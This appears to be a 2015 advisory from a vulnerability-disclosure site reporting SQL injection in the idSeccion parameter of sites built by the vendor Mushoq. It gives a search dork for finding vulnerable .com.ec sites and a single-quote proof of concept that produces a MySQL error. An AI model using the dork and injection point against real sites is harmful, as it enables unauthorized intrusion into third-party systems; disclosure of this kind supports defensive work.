idSeccion and other parameters are vulnerable to SQl injection

2015.08.08

Credit: Guillermo Garcia Marcos

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-89

Dork: inurl:index.php?idSeccion= site:com.ec intext:\"Desarrollo web\"

                                       |
                 ,------------=--------|___________|
-=============%%%|         |  |______|_|___________|
                 | | | | | | ||| | | | |___________|
                 `------------=--------|           |
                                       |

[+] Date: [7-8-2015]
[+] Autor Guillermo Garcia Marcos 
[+] Vendor: http://www.mushoq.com/
[+] Dork : inurl:index.php?idSeccion= site:com.ec intext:"Desarrollo web"
[+] Title: Vendor MUSHOQ SQL injection
[+] info: idSeccion and other parameters are vulnerable to SQl injection.


PoC:

SQLi from GET request:

XX.com.ec/index.php?idSeccion=%27

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 3


https://twitter.com/Guillesec

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

idSeccion and other parameters are vulnerable to SQl injection

Dork: inurl:index.php?idSeccion= site:com.ec intext:\"Desarrollo web\"

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.